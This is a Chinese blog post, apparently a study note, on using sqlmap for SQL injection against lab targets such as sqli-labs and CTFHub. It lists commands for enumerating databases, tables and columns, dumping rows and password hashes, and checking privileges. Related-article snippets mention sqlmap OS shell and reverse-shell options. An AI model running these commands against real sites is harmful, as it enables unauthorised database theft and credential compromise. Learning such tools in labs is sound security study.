sql学习3(sqlmap的使用)

最新推荐文章于 2024-04-27 12:15:18 发布
最新推荐文章于 2024-04-27 12:15:18 发布
阅读量573 收藏 20
点赞数 17
文章标签: sql 学习 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyy001128/article/details/137246627
版权

接上一篇学习2

6.sqlmap
(1)目标
1>指定url

检测注入点前需要指定检测对象

-u  指定需要检查的url,用单/双引号包裹

sqlmap -u 'http://192.168.31.180/sqli-labs-master/Less-1/?id=1'

 注:sqlmap只能验证和利用注入点,不能扫描漏洞

2>批量检测

-m  指定文件,可以批量扫描文件中的url(文件中需写上多个待检测的url,一个一行)

sqlmap -m urls.txt

3>指定数据库,表,字段

-D  指定数据库

-T  指定表

-C  指定字段

都需要用单/双引号包裹,常配合其他参数使用

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username' --dump

4>post请求

-r  指定需要检测的文件,通过post的请求方式检测目标

sqlmap -r 1.txt

注:检测post注入点可使用bp抓包,将http请求内容保存至txt文件中

5>cookie注入

--cookkie  指定cookie的值,用单/双引号包裹

sqlmap -u "http://xx?id=x" --cookie 'cookie'

(2)脱库

-a  获取所有内容(耗费时间长)

sqlmap -u 'http://xx/?id=1' -a

1>获取数据库

版本

sqlmap -u 'http://xx/?id=1' -b

当前使用数据库名

sqlmap -u 'http://xx/?id=1' --current-db

获取所有数据库名

sqlmap -u 'http://xx/?id=1' --dbs

2>获取表

指定数据库获取表

sqlmap -u 'http://xx/?id=1' -D 'security' --tables

同时获取多个库表名,库名间用逗号隔开

sqlmap -u 'http://xx/?id=1' -D 'security,sys' --tables

获取数据库中所有表

sqlmap -u 'http://xx/?id=1' --tables

3>获取字段

指定数据库和表

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns

注:只指定库不指定表会报错

获取当前数据库所有表的字段

sqlmap -u 'http://xx/?id=1' --columns

4>获取字段类型

--schema  获取字段类型,可指定库或表,不指定默认为数据库中所有字段类型

sqlmap -u 'http://xx/?id=1' -D 'security' --schema

5>获取数据

指定库,表,字段

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump

获取指定库中所有表的数据

sqlmap -u 'http://xx/?id=1' -D 'security' --dump

可用--start   --stop  指定开始和结束的行

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --start 1 --stop 5  --dump

6>获取用户

获取当前登录数据库用户

sqlmap -u 'http://xx/?id=1' --current-user

获取所有用户

sqlmap -u 'http://xx/?id=1' --users

获取用户密码

sqlmap -u 'http://xx/?id=1' --password

注:只能查出哈希值

获取用户权限

sqlmap -u 'http://xx/?id=1' --privileges

判断当前用户是否为管理员(返回true)

sqlmap -u 'http://xx/?id=1' --is-dba

7>获取主机名

sqlmap -u 'http://xx/?id=1' --hostname

8>搜索库,表,字段

搜索数据库中是否存在指定库,表,字段,需指定

sqlmap -u 'http://xx/?id=1' -D '指定库名' --search

sqlmap -u 'http://xxx/?id=1' -T '指定表名' --search

sqlmap -u 'http://xx/?id=1' -C '指定字段' --search

9>正在执行的sql语句

sqlmap -u 'http://xx/?id=1' --statements

 步骤

1.获取当前数据库

2.查表

3.查字段

4.查数据

练习
ctfhub技能树整数型注入

判断为数字型注入

查找数据库名,sqli

可知有两个表,flag和news

表flag中只有一个字段flag

查找表中数据可得flag

ctfhub技能树字符型注入

判断知是单引号注入 ,用查找数据库

得知库名为sqli

得知有flag和news两个表

有flag一个字段

查找数据可得flag

炸毛的飞鼠
关注
  • 17
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQLOracleSQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
笔记--sqlmap的基本命令
2301_76567007的博客
06-07 432
sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令 sqlmap -u “ –smart –dbms “Mysql”–os-shell #系统交互shell。sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反弹shell sqlmap -u “ –smart –dbms “Mysql”–reg-read #读取win系统注册表。
sqlmap使用教程(超详细)
热门推荐
songbai220
10-27 4万+
sqlmap使用教程(超详细) -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加
史上最详细sqlmap入门教程_sqlmap使用教程(1)
最新发布
2401_84253037的博客
04-27 919
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
sqlmap使用教程
weixin_57048716的博客
11-26 1730
常用步骤: 1.探测数据库名 --dbs --batch 2.探测表名 -D 库名 --tables --batch 3.探测字段名 -D 库名 -T 表名 --columns --batch 4.探测字段值 -D 库名 -T 表名 -C username(字段),password --dump --batch
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4555
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2915
使用sqlmap进行post注入学习笔记
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap学习思维导图
02-07
sqlmap学习思维导图,含基础知识及sql注入流程介绍及实例。
sqlmap使用总结1
08-03
SQLMap是一款强大的自动化SQL注入工具,用于检测和利用SQL注入漏洞。它可以帮助安全研究人员或渗透测试者快速识别网站应用程序中的...通过深入学习和实践,可以更好地发现和利用SQL注入漏洞,从而提高网络安全性。
SQLMAP参数介绍.pdf
09-25
sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具,sqlmap 可用于检测利用五种不同类型的 SQL 注入。本资料采用思维导图的方式,对SQLMAP这个工具参数进行详细的分类和介绍,是学习SQLMAP必备资料。
sqlmap中文手册.pdf
08-13
sqlmap中文版的使用,仅供学习研究使用.用户手册 介绍——介绍 sqlmap 技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史...
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 978
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
SQLMAP 脱库过程(post请求,三种方法)
u011571189的专栏
03-20 4770
一、准备工作 1、sqlmap为python语言开发,因此需要具备python环境。 2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过) 二、环境搭建 1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA 2、以DVMA的sql注入为例(DVMA安全级别为medium),进行详细介绍。 三、post请求脱库三...
史上最详细sqlmap入门教程_sqlmap使用教程,2024年最新学海无涯
2401_84254177的博客
04-11 1290
例如:python sqlmap.py -r D:\user.txt --columns -D testdb -T users -C name10、-C用来指定要枚举的数据库表的列名称例如:python sqlmap.py -r D:\user.txt --columns -D testdb -T users -C name使用这个参数sqlmap将不会从缓存里面加载数据,从而能将最新的数据注入到数据库。
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7036
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 347
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
sqlmapPOST注入与cookie注入
ve9etable的博客
10-28 2万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
超详细SQLMap使用攻略及技巧分享
Y525698136的博客
12-26 1137
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
sqlmap使用教程sql注入
08-17
如果您对SQL注入感兴趣,我建议您学习有关Web应用程序安全和SQL注入的基础知识,并且仅在合法和道德的环境中使用这些技术。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值